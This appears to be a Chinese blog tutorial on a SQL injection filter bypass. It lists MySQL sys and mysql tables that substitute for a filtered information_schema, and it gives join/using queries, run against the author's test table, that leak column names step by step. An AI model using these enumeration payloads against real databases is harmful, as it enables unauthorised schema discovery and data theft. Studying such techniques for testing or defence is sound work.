目录
当information_schema 被过滤了,那就意味着不能很容易的查到表名,列名,字段名了
代替information_schema的数据库
sys.x$schema_table_statistics_with_buffer
sys.x$schema_table_statistics
sys.x$ps_schema_table_statistics_io
sys.schema_auto_increment_columns
mysql.innodb_table_stats
mysql.innodb_table_index
例子(接下来的例子都以我的数据库来作为测试数据库)
依靠代替information_schema的数据库他们可以查询数据库名和表名,是没有办法查询到列名。以下是两个例子
利用join,using爆出列名
刚刚已经通过代替information_schema的数据库爆出了表名,接下来一开join爆出列名
例子
使用下列语句爆出一个列名id
select * from (select * from db_hero as a join db_hero)as c;
再使用using出去id字段,爆出剩下的列名
select * from (select * from db_hero as a join db_hero using(id))as c;
再爆出列名
select * from (select * from db_hero as a join db_hero using(name,id)) as c;
就这样一步步爆出所有列名,就可以进行注入了。
不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚